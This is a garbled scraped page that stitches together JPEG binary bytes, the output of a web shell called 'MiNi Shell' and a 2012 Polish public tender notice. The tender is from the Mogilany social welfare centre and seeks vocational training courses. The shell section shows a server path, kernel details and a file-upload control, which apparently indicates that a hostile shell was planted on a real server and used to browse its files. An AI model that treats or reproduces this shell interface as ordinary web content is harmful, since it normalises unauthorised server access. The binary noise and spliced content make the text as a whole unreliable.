JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120726/272304-N-2012.html

<p class="kh_header"><b>Mogilany: Świadczenie usług pn. Przeprowadzenie szkoleń i kursów dla beneficjentów projektu systemowego Aktywna integracja szansą dla Ciebie i Twojej Rodziny.</b><br>
<b>Numer ogłoszenia: 272304 - 2012; data zamieszczenia: 26.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Mogilanach , ul. Rynek 2A, 32-031 Mogilany, woj. małopolskie, tel. 012 2701025, faks 012 2701025.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mogilany.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług pn. Przeprowadzenie szkoleń i kursów dla beneficjentów projektu systemowego Aktywna integracja szansą dla Ciebie i Twojej Rodziny..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świadczenie usług pn. Przeprowadzenie szkoleń i kursów dla beneficjentów projektu systemowego Aktywna integracja szansą dla Ciebie i Twojej Rodziny obejmuje następujące części :       

Część I zamówienia: 
- przeprowadzenie szkolenia - Opiekun osób starszych i niepełnosprawnych - dla 2 osób wskazanych przez Zamawiającego, (zajęcia teoretyczne i praktyczne). 
- opracowanie kompletu materiałów szkoleniowych dla uczestników oraz ich wydrukowanie/powielenie w liczbie odpowiadającej ilości uczestników zakwalifikowanych do udziału w szkoleniu, 
- zapewnienie sali szkoleniowej,
- zapewnienie realizacji zajęć praktycznych w wyspecjalizowanej placówce opiekuńczej, z którą wykonawca posiada umowę na realizacje zajęć praktycznych i przedstawi ją zamawiającemu, 
- wystawienie zaświadczenia o ukończeniu szkolenia.
- wystawienie zaświadczenia o odbyciu zajęć praktycznych przez działającą placówkę opiekuńczą,
-  program szkolenia powinien zawierać następujące zagadnienia:

1.	Anatomia i fizjologia wieku podeszłego,
2.	Pielęgnacja chorych,
3.	Zasady udzielania pierwszej pomocy przedmedycznej,
4.	Zasady żywienia osób starszych,
5.	Starzenie się organizmu,
6.	Aktywizacja osób starszych i niepełnosprawnych,
7.	Psychologiczne aspekty pracy z osobą starszą i niepełnosprawną,
8.	Współpraca z rodziną i środowiskiem podopiecznego,
9.	Pełnienie roli i zakresu zadań opiekuna osób starszych.

Część II zamówienia: 
- przeprowadzenie Kursu prawa jazdy kat. B - dla 3 osób wskazanych przez Zamawiającego zgodnie z rozporządzenie Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów 
i egzaminatorów (Dz. U. z 2005 r. Nr 217, poz. 1834 z późn. zm.). 
- zorganizowanie i pokrycie kosztów pierwszego egzaminu teoretycznego państwowego i pierwszego egzaminu praktycznego państwowego,
- opracowanie kompletu materiałów szkoleniowych dla uczestników oraz ich wydrukowanie/powielenie w liczbie odpowiadającej ilości uczestników zakwalifikowanych do udziału w szkoleniu, 
- zapewnienie sali szkoleniowej,
- zorganizowanie i pokrycie kosztów badań lekarskich kandydatów na prawo jazdy kat B.                           
- wystawienie zaświadczenia o ukończonym kursie. 


Część III zamówienia : 
- przeprowadzenie szkolenia - Mała Księgowość ( nabycie wiedzy oraz praktycznych umiejętności do pracy w księgowości oraz prowadzenia rozliczeń działalności gospodarczej  w zakresie Podatkowej księgi przychodów i rozchodów z wykorzystaniem programów komputerowych, np. Symfonia, Optima)-  dla 1 osoby wskazanej przez Zamawiającego ( zajęcia teoretyczne i praktyczne)
- opracowanie kompletu materiałów szkoleniowych dla uczestników oraz ich wydrukowanie/powielenie w liczbie odpowiadającej ilości uczestników zakwalifikowanych do udziału w szkoleniu, 
- zapewnienie sali szkoleniowej wraz z niezbędnym wyposażeniem, 
- wystawienie zaświadczenia o ukończonym kursie,
- program szkolenia powinien zawierać następujące zagadnienia:
1.	Ewidencjonowanie zdarzeń gospodarczych oraz ich dokumentowanie w podatkowej księdze przychodów i rozchodów,
2.	Stosowanie zasad otwierania, prowadzenia i zamykania ksiąg rachunkowych,
3.	Identyfikacja poszczególnych podatków oraz ustalania podstaw prawnych opodatkowania danym podatkiem,
4.	Identyfikacja podstaw prawnych z zakresu księgowości,
5.	obliczania należnych kwot podatków z wykorzystaniem obowiązujących stawek jak też ulg i zwolnień podatkowych,
6.	Sporządzanie deklaracji podatkowych, pism i rozliczeń w tym zakresie,
7.	Kontrolowanie dokonanych operacji w zakresie spraw podatkowych,
8.	Wyliczanie wynagrodzenie za pracę,
9.	Rozliczanie składek ZUS,
10.	Posługiwanie się programem - Płatnik,
11.	Sporządzania not księgowych i innej dokumentacji na potrzeby ewidencji,
12.	Wykorzystanie techniki komputerowej w rachunkowości i rozliczeniach firmy.

Część IV zamówienia:
- przeprowadzenie szkolenia - Manicure, pedicure, stylizacja paznokci i kurs wizażu - dla 1 osoby wskazanej przez Zamawiającego (zajęcia teoretyczne i praktyczne)
- opracowanie kompletu materiałów szkoleniowych dla uczestników oraz ich wydrukowanie/powielenie w liczbie odpowiadającej ilości uczestników zakwalifikowanych do udziału w szkoleniu 
- zapewnienie materiałów szkoleniowych do zajęć praktycznych; 
- zapewnienie sali szkoleniowej,
- wystawienie zaświadczenia o ukończonym kursie,
- program szkolenia powinien zawierać następujące zagadnienia:
1.	Wiedza na temat dłoni, charakterystyka i budowa paznokcia, sposoby pielęgnacji, choroby, defekty,
2.	Zapoznanie się z przepisami BHP w gabinecie kosmetycznym, specyfikacja pracy, wyposażenie pomieszczenia, metody i środki, zasady dezynfekcji i sterylizacji,
3.	Manicure biologiczny, cążkowy, za pomocą frezarki.
4.	Metody i techniki przedłużania paznokci  np. żelowa  i akrylowa,
5.	Zdobienie paznokci różnymi technikami,
6.	Warsztat pracy wizażysty,
7.	Rozróżnianie typów skóry,
8.	Sposoby retuszowania niedoskonałości skóry,
9.	Analiza kolorystyczna,
10.	Makijaż dzienny,
11.	Makijaż wieczorowy,
12.	Makijaż ślubny,
13.	Makijaż osoby dojrzałej,
14.	Makijaż sceniczny, do pokazów art.
15.	Makijaż korekcyjny.

Część V zamówienia: 
- przeprowadzenie szkolenia - Obsługa kasy fiskalnej - dla 4 osób wskazanych przez Zamawiającego - opracowanie kompletu materiałów szkoleniowych dla uczestników oraz ich wydrukowanie/powielenie w liczbie odpowiadającej ilości uczestników zakwalifikowanych do udziału w szkoleniu, 
- zapewnienie sali szkoleniowej. 
-wystawienie zaświadczenia o ukończonym kursie;
- program szkolenia powinien zawierać m.in. następujące zagadnienia : 
1.	Podstawowe pojęcia dotyczące kas fiskalnych, 
2.	Zasady instalowania kas, 
3.	Dokumenty fiskalne drukowane przez kasę, 
4.	Ogólne zasady pracy przy kasie fiskalnej, 
5.	Budowa kas, 
6.	Funkcje i rodzaje płatności,
7.	Rozliczanie kaucji na kasie fiskalnej, sprzedaż niepełnych opakowań, wypłaty i wpłaty,
8.	Raporty kas fiskalnych, czytające i zerujące,
9.	Dokumenty obrotu magazynowego,
10.	Zakup i sprzedaż wg faktury VAT,
11.	Wydanie i przyjęcie zewnętrzne, przesunięcie międzymagazynowe,
12.	Rozchód i przychód wewnętrzny, 
13.	Praktyczne ćwiczenia sprzedaży z zastosowaniem kasy fiskalnej, 
14.	Rozpoznawanie i kontrola znaków pieniężnych.

Część VI zamówienia : 
- przeprowadzenie szkolenia - Spawanie MIG podstawowe dla 1 osoby wskazanej przez Zamawiającego (zajęcia teoretyczne i praktyczne) zgodnie z Rozporządzenie Ministra Gospodarki z dnia 27 kwietnia 2000 r. w sprawie bezpieczeństwa i higieny pracy przy pracach spawalniczych
- opracowanie kompletu materiałów szkoleniowych dla uczestników oraz ich wydrukowanie/powielenie w liczbie odpowiadającej ilości uczestników zakwalifikowanych do udziału w szkoleniu, 
opłacenie i zorganizowanie praktycznego i teoretycznego egzaminu państwowego (przeprowadzanego zgodnie z normą PN-EN 287-1+A1),
- zapewnienie sali szkoleniowej, 
-wystawienie zaświadczenia o ukończonym kursie.

Część VII zamówienia: 
- przeprowadzenie kursu przygotowawczego do egzaminu kwalifikacyjnego w zakresie dozoru i eksploatacji urządzeń elektroenergetycznych z pomiarami (uprawnienia SEP, świadectwo kwalifikacyjne E i D) - dla 1 osoby wskazanej przez Zamawiającego. Program szkolenia zgodnie z wymaganiami prawa energetycznego z dnia 10 kwietnia 1997 (art. 54 Prezesa Urzędu Regulacji Energetyki)
- opracowanie kompletu materiałów szkoleniowych dla uczestników oraz ich wydrukowanie/powielenie w liczbie odpowiadającej ilości uczestników zakwalifikowanych do udziału w szkoleniu, 
- zapewnienie sali szkoleniowej,
- wystawienie zaświadczenia o ukończonym kursie,
- zorganizowanie i pokrycie kosztów pierwszego egzaminu kwalifikacyjnego  w zakresie eksploatacji i dozoru instalacji i urządzeń elektrycznych  zgodnie z Rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej Dz.U. nr 89 p 828 z dnia 28.04.2003r ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykaz usług szkoleniowych wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ilości godzin, tematu, dat wykonania i zamawiających ( załącznik nr 5 do formularza oferty ). 
2. Oświadczenie wykonawcy o wpisie do Rejestru Instytucji Szkoleniowych.  
3.  Szczegółowy program dla każdego szkolenia z podaniem ilości godzin.   
4. Stosowne pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru. Pełnomocnictwo(a) ma być złożone w formie oryginału lub kopii poświadczonej  przez notariusza.
5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego. 
6. Umowę regulującą współpracę wykonawcy z placówką, w której będą realizowane zajęcia praktyczne i  zawierającą ilości godzin, opiekuna, adres placówki - dotyczy szkolenia - Opiekun osób starszych i niepełnosprawnych.
7. Umowę regulującą współpracę wykonawcy z podwykonawcą/ami - jeżeli dotyczy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70.0</li>
<li>2 - Doświadczenie w przeprowadzaniu szkoleń - 30.0</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę niniejszej umowy w zakresie terminu realizacji w sytuacji wystąpienia zdarzeń losowych niezależnych od zamawiającego w wyniku których wykonawca nie będzie w stanie wykonać zadania w ustalonych terminach. Zmiana umowy w zakresie terminu realizacji umowy wymaga formy pisemnej w postaci aneksu pod rygorem nieważności.
W pozostałych postanowieniach umowy zakazuje się istotnych zmian w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy - art. 144 ust. 1 Pzp.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mogilany.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> gops.mogilany@pro.onet.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.08.2012 godzina 09:30, miejsce: Gminny Ośrodek Pomocy Społecznej w Mogilanach ul. Rynek 2A, 32-031 Mogilany - 
pokój 01, parter..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Realizacja szkoleń w ramach projektu systemowego - Aktywna Integracja Szansą dla Ciebie i Twojej Rodziny - współfinansowanego ze środków Unii Europejskiej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com